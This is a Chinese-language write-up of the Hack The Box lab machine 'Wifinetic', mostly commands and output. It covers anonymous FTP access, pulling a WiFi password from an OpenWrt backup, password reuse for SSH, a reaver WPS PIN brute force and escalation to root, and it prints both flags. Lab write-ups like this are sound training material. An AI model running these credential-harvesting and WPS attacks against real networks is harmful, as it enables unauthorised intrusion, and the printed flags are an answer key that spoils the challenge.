HTB:Wifinetic[WriteUP]
目录
连接至HTB并启动靶机
1.What is the name of the OpenWRT backup file accessible over FTP?
使用nmap对靶机21、22端口进行脚本、服务信息扫描
2.Whats the WiFi password for SSID OpenWRT?
3.Which user reused the WiFi password on thier local account?
4.Submit the flag located in the netadmin user's home directory.
USER_FLAG:cc0491634861e5a3964c119ea9e35c79
5.What user space daemon software is being used to create access point and authentication servers?
6.Which interface is being used for monitoring?
7.What is the WPA password for the network on the mon0 interface?
8.Submit the flag located on the root folder.
ROOT_FLAG:1721e8c80650230ffc3ae02e11ed01f4
连接至HTB并启动靶机
靶机IP:10.10.11.247
分配IP:10.10.16.6
1.What is the name of the OpenWRT backup file accessible over FTP?
使用fscan对靶机进行端口扫描
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# fscan -nopoc -nobr -no -h 10.10.11.247___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
10.10.11.247:22 open
10.10.11.247:21 open
[*] alive ports len is: 2
start vulscan
已完成 2/2
[*] 扫描结束,耗时: 374.224745ms
由扫描结果可见,靶机开放21、22共2个端口
使用nmap对靶机21、22端口进行脚本、服务信息扫描
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p 21,22 -sCV 10.10.11.247
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-18 01:51 EDT
Nmap scan report for 10.10.11.247
Host is up (0.13s latency).PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 2023 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 2023 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 2023 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 2023 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 2023 employees_wellness.pdf
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.6
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds
使用Anonymous匿名身份登录靶机FTP服务器
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ftp 10.10.11.247
Connected to 10.10.11.247.
220 (vsFTPd 3.0.3)
Name (10.10.11.247:kali): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||47610|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 4434 Jul 31 2023 MigrateOpenWrt.txt
-rw-r--r-- 1 ftp ftp 2501210 Jul 31 2023 ProjectGreatMigration.pdf
-rw-r--r-- 1 ftp ftp 60857 Jul 31 2023 ProjectOpenWRT.pdf
-rw-r--r-- 1 ftp ftp 40960 Sep 11 2023 backup-OpenWrt-2023-07-26.tar
-rw-r--r-- 1 ftp ftp 52946 Jul 31 2023 employees_wellness.pdf
226 Directory send OK.
由回显可见,该目录下存在一个OpenWRT备份文件:backup-OpenWrt-2023-07-26.tar
2.Whats the WiFi password for SSID OpenWRT?
将backup-OpenWrt-2023-07-26.tar文件下载到本地
get backup-OpenWrt-2023-07-26.tarftp> get backup-OpenWrt-2023-07-26.tar
local: backup-OpenWrt-2023-07-26.tar remote: backup-OpenWrt-2023-07-26.tar
229 Entering Extended Passive Mode (|||46040|)
150 Opening BINARY mode data connection for backup-OpenWrt-2023-07-26.tar (40960 bytes).
100% |*************************************************************| 40960 162.37 KiB/s 00:00 ETA
226 Transfer complete.
40960 bytes received in 00:00 (61.77 KiB/s)
解压backup-OpenWrt-2023-07-26.tar文件
tar -xvf backup-OpenWrt-2023-07-26.tar┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# tar -xvf backup-OpenWrt-2023-07-26.tar
./etc/
./etc/config/
./etc/config/system
./etc/config/wireless
./etc/config/firewall
./etc/config/network
./etc/config/uhttpd
./etc/config/dropbear
./etc/config/ucitrack
./etc/config/rpcd
./etc/config/dhcp
./etc/config/luci
./etc/uhttpd.key
./etc/uhttpd.crt
./etc/sysctl.conf
./etc/inittab
./etc/group
./etc/opkg/
./etc/opkg/keys/
./etc/opkg/keys/4d017e6f1ed5d616
./etc/hosts
./etc/passwd
./etc/shinit
./etc/rc.local
./etc/dropbear/
./etc/dropbear/dropbear_ed25519_host_key
./etc/dropbear/dropbear_rsa_host_key
./etc/shells
./etc/profile
./etc/nftables.d/
./etc/nftables.d/10-custom-filter-chains.nft
./etc/nftables.d/README
./etc/luci-uploads/
./etc/luci-uploads/.placeholder
进入解压后目录中,找到etc/config/wireless文件并查看其内容
┌──(root㉿kali)-[/home/…/Desktop/temp/etc/config]
└─# cat wirelessconfig wifi-device 'radio0'
option type 'mac80211'
option path 'virtual/mac80211_hwsim/hwsim0'
option cell_density '0'
option channel 'auto'
option band '2g'
option txpower '20'config wifi-device 'radio1'
option type 'mac80211'
option path 'virtual/mac80211_hwsim/hwsim1'
option channel '36'
option band '5g'
option htmode 'HE80'
option cell_density '0'config wifi-iface 'wifinet0'
option device 'radio0'
option mode 'ap'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
option wps_pushbutton '1'config wifi-iface 'wifinet1'
option device 'radio1'
option mode 'sta'
option network 'wwan'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
获取SSID为OpenWRT的密码:VeRyUniUqWiFIPasswrd1!
3.Which user reused the WiFi password on thier local account?
查看etc/passwd文件内容
┌──(root㉿kali)-[/home/kali/Desktop/temp/etc]
└─# cat passwd
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
ntp:x:123:123:ntp:/var/run/ntp:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
logd:x:514:514:logd:/var/run/logd:/bin/false
ubus:x:81:81:ubus:/var/run/ubus:/bin/false
netadmin:x:999:999::/home/netadmin:/bin/false
尝试使用上文拿到的WIFI密码,登录账户:netadmin
┌──(root㉿kali)-[/home/kali/Desktop/temp/etc]
└─# ssh netadmin@10.10.11.247
The authenticity of host '10.10.11.247 (10.10.11.247)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:3: [hashed name]
~/.ssh/known_hosts:5: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.247' (ED25519) to the list of known hosts.
netadmin@10.10.11.247's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantageSystem information as of Fri 18 Oct 2024 09:30:32 AM UTC
System load: 0.0
Usage of /: 65.7% of 4.76GB
Memory usage: 7%
Swap usage: 0%
Processes: 228
Users logged in: 0
IPv4 address for eth0: 10.10.11.247
IPv6 address for eth0: dead:beef::250:56ff:feb9:e5b6
IPv4 address for wlan0: 192.168.1.1
IPv4 address for wlan1: 192.168.1.23* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt updateLast login: Tue Sep 12 12:46:00 2023 from 10.10.14.23
netadmin@wifinetic:~$
4.Submit the flag located in the netadmin user's home directory.
查找user_flag位置
find / -name 'user.txt' 2>/dev/null查看user_flag内容
cat /home/netadmin/user.txtnetadmin@wifinetic:~$ whoami
netadmin
netadmin@wifinetic:~$ find / -name 'user.txt' 2>/dev/null
/home/netadmin/user.txt
netadmin@wifinetic:~$ cat /home/netadmin/user.txt
cc0491634861e5a3964c119ea9e35c79
USER_FLAG:cc0491634861e5a3964c119ea9e35c79
5.What user space daemon software is being used to create access point and authentication servers?
查看WIFI认证服务状态:hostapd
systemctl status hostapd.servicenetadmin@wifinetic:~$ systemctl status hostapd.service
● hostapd.service - Advanced IEEE 802.11 AP and IEEE 802.1X/WPA/WPA2/EAP Authenticator
Loaded: loaded (/lib/systemd/system/hostapd.service; enabled; vendor preset: enabled)
Active: active (running) since Fri 2024-10-18 10:54:27 UTC; 5s ago
Process: 27508 ExecStart=/usr/sbin/hostapd -B -P /run/hostapd.pid -B $DAEMON_OPTS ${DAEMON_CONF} (code=exited, status=0/SUCCESS)
Main PID: 27525 (hostapd)
Tasks: 1 (limit: 4595)
Memory: 936.0K
CGroup: /system.slice/hostapd.service
└─27525 /usr/sbin/hostapd -B -P /run/hostapd.pid -B /etc/hostapd/hostapd.conf
6.Which interface is being used for monitoring?
查看无线网络设备信息
iw devnetadmin@wifinetic:~$ iw dev
phy#2
Interface mon0
ifindex 7
wdev 0x200000002
addr 02:00:00:00:02:00
type monitor
txpower 20.00 dBm
Interface wlan2
ifindex 5
wdev 0x200000001
addr 02:00:00:00:02:00
type managed
txpower 20.00 dBm
phy#1
Unnamed/non-netdev interface
wdev 0x1000001e6
addr 42:00:00:00:01:00
type P2P-device
txpower 20.00 dBm
Interface wlan1
ifindex 4
wdev 0x100000001
addr 02:00:00:00:01:00
ssid OpenWrt
type managed
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBm
phy#0
Interface wlan0
ifindex 3
wdev 0x1
addr 02:00:00:00:00:00
ssid OpenWrt
type AP
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBm
由设备输出信息可见,除去mon0接口其他是受监管模式,而wlan0为AP模式
这意味着我们可以尝试捕获mon0接口数据包对它进行WPA密码爆破
7.What is the WPA password for the network on the mon0 interface?
查看靶机安装的网络相关工具
getcap -r / 2>/dev/nullnetadmin@wifinetic:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep
利用AP模式的wlan0接口爆破mon0接口的WPA密码
reaver -i mon0 -b 02:00:00:00:00:00netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>[+] Waiting for beacon from 02:00:00:00:00:00
[+] Received beacon from 02:00:00:00:00:00
[!] Found packet with bad FCS, skipping...
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
成功获取到WPA密码:WhatIsRealAnDWhAtIsNot51121!
8.Submit the flag located on the root folder.
尝试使用该WPA密码切换成root用户
netadmin@wifinetic:~$ su root
Password:
root@wifinetic:/home/netadmin# whoami
root
查找root_flag位置
find / -name 'root.txt' 2>/dev/null查看root_flag内容
/root/root.txtroot@wifinetic:/home/netadmin# find / -name 'root.txt' 2>/dev/null
/root/root.txt
root@wifinetic:/home/netadmin# cat /root/root.txt
1721e8c80650230ffc3ae02e11ed01f4